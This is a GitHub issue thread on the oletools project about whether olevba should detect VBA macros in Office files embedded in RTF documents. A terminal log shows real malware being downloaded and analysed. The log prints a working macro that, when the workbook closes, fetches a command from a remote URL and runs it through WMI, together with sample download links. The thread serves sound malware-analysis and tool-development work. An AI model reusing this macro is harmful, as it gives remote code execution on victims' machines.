search

decalage2 / oletools

oletools - python tools to analyze MS OLE2 files (Structured Storage, Compound File Binary Format) and MS Office documents, for malware analysis, forensics and debugging.
http://www.decalage.info/python/oletools
Other
2.94k stars 565 forks source link

olevba: file is RTF, which cannot contain VBA Macros? #643

Open dlucredativ opened 4 years ago

dlucredativ commented 4 years ago

When olevba scans an RTF file, it raises an error stating that RTFs cannot contain VBA Macros. Is this info outdated? rtfobj is able to extract OLE objects, but cannot, as far as I know, scan them for macros. olevba invoked on rtfobj-extracted OLE objects however can find macros. Is there a single oletools utility that can report VBA macros inside an RTF or better any relevant document type containing them?

decalage2 commented 4 years ago

Hi @dlucredativ, strictly speaking an RTF file cannot contain VBA macros by itself (it is not part of the RTF specifications, and Word cannot store VBA macros in an RTF file). However you're right, it is possible to embed a Word, Excel, PowerPoint or Publisher file inside RTF using an OLE object, and those files may contain VBA macros. But then to activate the macro, the user would have to open the RTF, then double-click the OLE object, and then enable macros when the sub-document opens. I tried it with my latest version of Word, and so far I did not manage to run macros this way. I created a DOCM with VBA macros, and then embedded it inside an RTF file as an object. First, when opening the RTF Word displays a specific warning message that the embedded document contains macros (not the usual "enable content" warning), even before displaying the RTF file: image

Second, even if I click the button to enable macros, nothing happens when I open the embedded document. I tried both Document_Open and Document_Close. So did you manage to run VBA macros from a file embedded into RTF, or did you see malware using that technique for obfuscation? I'd be curious to see if it works.

dlucredativ commented 4 years ago

So did you manage to run VBA macros from a file embedded into RTF, or did you see malware using that technique for obfuscation? I'd be curious to see if it works.

I cannot test them, but real malware samples can be obtained via [1]. Some of them fit my question, e.g. [2] and its payload [3].

demo@vm:/tmp/malware ls
demo@vm:/tmp/malware SHA=2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f
demo@vm:/tmp/malware wget -q https://urlhaus-api.abuse.ch/v1/download/$SHA -O malware.zip && unzip malware.zip
Archive:  malware.zip
  inflating: 2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f
demo@vm:/tmp/malware file $SHA
2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f: Rich Text Format data, version 1, unknown character set
demo@vm:/tmp/malware olevba $SHA
olevba 0.56 on Python 3.8.5 - http://decalage.info/python/oletools
ERROR    Failed to open 2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f -- probably not supported!
Traceback (most recent call last):
  File "/usr/lib/python3.8/dist-packages/oletools/olevba.py", line 4351, in process_file
    vba_parser = VBA_Parser_CLI(filename, data=data, container=container,
  File "/usr/lib/python3.8/dist-packages/oletools/olevba.py", line 3904, in __init__
    super(VBA_Parser_CLI, self).__init__(*args, **kwargs)
  File "/usr/lib/python3.8/dist-packages/oletools/olevba.py", line 2786, in __init__
    raise FileOpenError(msg)
oletools.olevba.FileOpenError: Failed to open file 2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f is RTF, which cannot contain VBA Macros. Please use rtfobj to analyse it.
demo@vm:/tmp/malware rtfobj -d objects -s all $SHA
rtfobj 0.55.2 on Python 3.8.5 - http://decalage.info/python/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues

===============================================================================
File: '2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f' - size: 974186 bytes
---+----------+---------------------------------------------------------------
id |index     |OLE Object                                                     
---+----------+---------------------------------------------------------------
0  |00002AD9h |format_id: 2 (Embedded)                                        
   |          |class name: b'Excel.Sheet.8'                                   
   |          |data size: 35328                                               
   |          |MD5 = '062b943b140f54f92bc79899abc27bdd'                       
   |          |CLSID: 00020820-0000-0000-C000-000000000046                    
   |          |Microsoft Microsoft Excel 97-2003 Worksheet (Excel.Sheet.8)    
---+----------+---------------------------------------------------------------
1  |00019734h |format_id: 2 (Embedded)                                        
   |          |class name: b'Excel.Sheet.8'                                   
   |          |data size: 35328                                               
   |          |MD5 = 'fb468f15c09e079311484dc389054112'                       
   |          |CLSID: 00020820-0000-0000-C000-000000000046                    
   |          |Microsoft Microsoft Excel 97-2003 Worksheet (Excel.Sheet.8)    
---+----------+---------------------------------------------------------------
2  |00030355h |format_id: 2 (Embedded)                                        
   |          |class name: b'Excel.Sheet.8'                                   
   |          |data size: 35328                                               
   |          |MD5 = '76243fb4ed5a8f21f5e4bfb3af8a7a1c'                       
   |          |CLSID: 00020820-0000-0000-C000-000000000046                    
   |          |Microsoft Microsoft Excel 97-2003 Worksheet (Excel.Sheet.8)    
---+----------+---------------------------------------------------------------
3  |00046F76h |format_id: 2 (Embedded)                                        
   |          |class name: b'Excel.Sheet.8'                                   
   |          |data size: 35328                                               
   |          |MD5 = 'eb1edb044cf095d075fbf1a2d326e34a'                       
   |          |CLSID: 00020820-0000-0000-C000-000000000046                    
   |          |Microsoft Microsoft Excel 97-2003 Worksheet (Excel.Sheet.8)    
---+----------+---------------------------------------------------------------
4  |0005DB9Eh |format_id: 2 (Embedded)                                        
   |          |class name: b'Excel.Sheet.8'                                   
   |          |data size: 35328                                               
   |          |MD5 = 'eac12b8618248835b8e8c8c20789e528'                       
   |          |CLSID: 00020820-0000-0000-C000-000000000046                    
   |          |Microsoft Microsoft Excel 97-2003 Worksheet (Excel.Sheet.8)    
---+----------+---------------------------------------------------------------
5  |000747BFh |format_id: 2 (Embedded)                                        
   |          |class name: b'Excel.Sheet.8'                                   
   |          |data size: 35328                                               
   |          |MD5 = '5972477435f1cd45457ed4215ee7b284'                       
   |          |CLSID: 00020820-0000-0000-C000-000000000046                    
   |          |Microsoft Microsoft Excel 97-2003 Worksheet (Excel.Sheet.8)    
---+----------+---------------------------------------------------------------
6  |0008B3E0h |format_id: 2 (Embedded)                                        
   |          |class name: b'Excel.Sheet.8'                                   
   |          |data size: 35328                                               
   |          |MD5 = '07e49e5b1e6e654666014accb9f79b06'                       
   |          |CLSID: 00020820-0000-0000-C000-000000000046                    
   |          |Microsoft Microsoft Excel 97-2003 Worksheet (Excel.Sheet.8)    
---+----------+---------------------------------------------------------------
7  |000A2001h |format_id: 2 (Embedded)                                        
   |          |class name: b'Excel.Sheet.8'                                   
   |          |data size: 35328                                               
   |          |MD5 = '07c66587340f8d3f2b395db2663bf90c'                       
   |          |CLSID: 00020820-0000-0000-C000-000000000046                    
   |          |Microsoft Microsoft Excel 97-2003 Worksheet (Excel.Sheet.8)    
---+----------+---------------------------------------------------------------
8  |000B8C22h |format_id: 2 (Embedded)                                        
   |          |class name: b'Excel.Sheet.8'                                   
   |          |data size: 35328                                               
   |          |MD5 = 'f82f79b71d989ac3a34499f69527f860'                       
   |          |CLSID: 00020820-0000-0000-C000-000000000046                    
   |          |Microsoft Microsoft Excel 97-2003 Worksheet (Excel.Sheet.8)    
---+----------+---------------------------------------------------------------
9  |000CF843h |format_id: 2 (Embedded)                                        
   |          |class name: b'Excel.Sheet.8'                                   
   |          |data size: 35328                                               
   |          |MD5 = '92bde4834b89d2867f093533a55e258f'                       
   |          |CLSID: 00020820-0000-0000-C000-000000000046                    
   |          |Microsoft Microsoft Excel 97-2003 Worksheet (Excel.Sheet.8)    
---+----------+---------------------------------------------------------------
Saving file embedded in OLE object #0:
  format_id  = 2
  class name = b'Excel.Sheet.8'
  data size  = 35328
  saving to file objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_00002AD9.bin
  md5 062b943b140f54f92bc79899abc27bdd
Saving file embedded in OLE object #1:
  format_id  = 2
  class name = b'Excel.Sheet.8'
  data size  = 35328
  saving to file objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_00019734.bin
  md5 fb468f15c09e079311484dc389054112
Saving file embedded in OLE object #2:
  format_id  = 2
  class name = b'Excel.Sheet.8'
  data size  = 35328
  saving to file objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_00030355.bin
  md5 76243fb4ed5a8f21f5e4bfb3af8a7a1c
Saving file embedded in OLE object #3:
  format_id  = 2
  class name = b'Excel.Sheet.8'
  data size  = 35328
  saving to file objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_00046F76.bin
  md5 eb1edb044cf095d075fbf1a2d326e34a
Saving file embedded in OLE object #4:
  format_id  = 2
  class name = b'Excel.Sheet.8'
  data size  = 35328
  saving to file objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_0005DB9E.bin
  md5 eac12b8618248835b8e8c8c20789e528
Saving file embedded in OLE object #5:
  format_id  = 2
  class name = b'Excel.Sheet.8'
  data size  = 35328
  saving to file objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_000747BF.bin
  md5 5972477435f1cd45457ed4215ee7b284
Saving file embedded in OLE object #6:
  format_id  = 2
  class name = b'Excel.Sheet.8'
  data size  = 35328
  saving to file objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_0008B3E0.bin
  md5 07e49e5b1e6e654666014accb9f79b06
Saving file embedded in OLE object #7:
  format_id  = 2
  class name = b'Excel.Sheet.8'
  data size  = 35328
  saving to file objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_000A2001.bin
  md5 07c66587340f8d3f2b395db2663bf90c
Saving file embedded in OLE object #8:
  format_id  = 2
  class name = b'Excel.Sheet.8'
  data size  = 35328
  saving to file objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_000B8C22.bin
  md5 f82f79b71d989ac3a34499f69527f860
Saving file embedded in OLE object #9:
  format_id  = 2
  class name = b'Excel.Sheet.8'
  data size  = 35328
  saving to file objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_000CF843.bin
  md5 92bde4834b89d2867f093533a55e258f
demo@vm:/tmp/malware file objects/*
objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_00002AD9.bin: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Windows User, Last Saved By: Eng Moha, Name of Creating Application: Microsoft Excel, Create Time/Date: Sun Mar  1 14:36:15 2020, Last Saved Time/Date: Thu Mar 12 06:22:53 2020, Security: 0
objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_00019734.bin: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Windows User, Last Saved By: Eng Moha, Name of Creating Application: Microsoft Excel, Create Time/Date: Sun Mar  1 14:36:15 2020, Last Saved Time/Date: Thu Mar 12 06:22:53 2020, Security: 0
objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_00030355.bin: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Windows User, Last Saved By: Eng Moha, Name of Creating Application: Microsoft Excel, Create Time/Date: Sun Mar  1 14:36:15 2020, Last Saved Time/Date: Thu Mar 12 06:22:53 2020, Security: 0
objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_00046F76.bin: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Windows User, Last Saved By: Eng Moha, Name of Creating Application: Microsoft Excel, Create Time/Date: Sun Mar  1 14:36:15 2020, Last Saved Time/Date: Thu Mar 12 06:22:53 2020, Security: 0
objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_0005DB9E.bin: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Windows User, Last Saved By: Eng Moha, Name of Creating Application: Microsoft Excel, Create Time/Date: Sun Mar  1 14:36:15 2020, Last Saved Time/Date: Thu Mar 12 06:22:53 2020, Security: 0
objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_000747BF.bin: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Windows User, Last Saved By: Eng Moha, Name of Creating Application: Microsoft Excel, Create Time/Date: Sun Mar  1 14:36:15 2020, Last Saved Time/Date: Thu Mar 12 06:22:53 2020, Security: 0
objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_0008B3E0.bin: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Windows User, Last Saved By: Eng Moha, Name of Creating Application: Microsoft Excel, Create Time/Date: Sun Mar  1 14:36:15 2020, Last Saved Time/Date: Thu Mar 12 06:22:53 2020, Security: 0
objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_000A2001.bin: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Windows User, Last Saved By: Eng Moha, Name of Creating Application: Microsoft Excel, Create Time/Date: Sun Mar  1 14:36:15 2020, Last Saved Time/Date: Thu Mar 12 06:22:53 2020, Security: 0
objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_000B8C22.bin: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Windows User, Last Saved By: Eng Moha, Name of Creating Application: Microsoft Excel, Create Time/Date: Sun Mar  1 14:36:15 2020, Last Saved Time/Date: Thu Mar 12 06:22:53 2020, Security: 0
objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_000CF843.bin: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Windows User, Last Saved By: Eng Moha, Name of Creating Application: Microsoft Excel, Create Time/Date: Sun Mar  1 14:36:15 2020, Last Saved Time/Date: Thu Mar 12 06:22:53 2020, Security: 0
demo@vm:/tmp/malware olevba objects/*
olevba 0.56 on Python 3.8.5 - http://decalage.info/python/oletools
Flags        Filename                                                         
-----------  -----------------------------------------------------------------
OLE:M-SIH--- objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_00002AD9.bin
OLE:M-SIH--- objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_00019734.bin
OLE:M-SIH--- objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_00030355.bin
OLE:M-SIH--- objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_00046F76.bin
OLE:M-SIH--- objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_0005DB9E.bin
OLE:M-SIH--- objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_000747BF.bin
OLE:M-SIH--- objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_0008B3E0.bin
OLE:M-SIH--- objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_000A2001.bin
OLE:M-SIH--- objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_000B8C22.bin
OLE:M-SIH--- objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_000CF843.bin

(Flags: OpX=OpenXML, XML=Word2003XML, FlX=FlatOPC XML, MHT=MHTML, TXT=Text, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)

demo@vm:/tmp/malware olevba objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_00002AD9.bin
olevba 0.56 on Python 3.8.5 - http://decalage.info/python/oletools
===============================================================================
FILE: objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_00002AD9.bin
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls 
in file: objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_00002AD9.bin - OLE stream: '_VBA_PROJECT_CUR/VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Private Sub Workbook_BeforeClose(Cancel As Boolean)

Worksheets(1).Activate
Call ccc
End Sub

-------------------------------------------------------------------------------
VBA MACRO Sheet1.cls 
in file: objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_00002AD9.bin - OLE stream: '_VBA_PROJECT_CUR/VBA/Sheet1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Module1.bas 
in file: objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_00002AD9.bin - OLE stream: '_VBA_PROJECT_CUR/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Sub ccc()
'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox
'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox
'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox
'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox
Dm = "http://office-cleaner-index.com/fifa.jpg|||msxml2.xmlhttp"

g = Split(Dm, "|||")
Dim pageText1 As String
strURL = g(0)
VB = g(1)
Set xmlHttp = CreateObject(VB)
With xmlHttp
.Open "get", strURL, False
.send
pageText = .responseText
End With
pageText1 = pageText

Call At(pageText1)
End Sub

Function At(Str As String)

'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox
'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox
'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox
Set oProcess = CreateObject("winmgmts:Win32_Process")

Set oInParams = oProcess.Methods_("Create"). _
    InParameters.SpawnInstance_

oInParams.CommandLine = Str
oInParams.ProcessStartupInformation = objConfig

Set oOutParams = oProcess.ExecMethod_("Create", oInParams)

End Function

-------------------------------------------------------------------------------
VBA MACRO xlm_macro.txt 
in file: xlm_macro - OLE stream: 'xlm_macro'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet1
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|Suspicious|Open                |May open a file                              |
|Suspicious|Create              |May execute file or a system command through |
|          |                    |WMI                                          |
|Suspicious|Call                |May call a DLL using Excel 4 Macros (XLM/XLF)|
|Suspicious|CreateObject        |May create an OLE object                     |
|Suspicious|msxml2.xmlhttp      |May download files from the Internet         |
|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
|IOC       |http://office-      |URL                                          |
|          |cleaner-            |                                             |
|          |index.com/fifa.jpg  |                                             |
+----------+--------------------+---------------------------------------------+

demo@vm:/tmp/malware

[1] https://urlhaus.abuse.ch/browse/tag/rtf/ [2] https://urlhaus.abuse.ch/url/324574/ [3] https://urlhaus-api.abuse.ch/v1/download/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f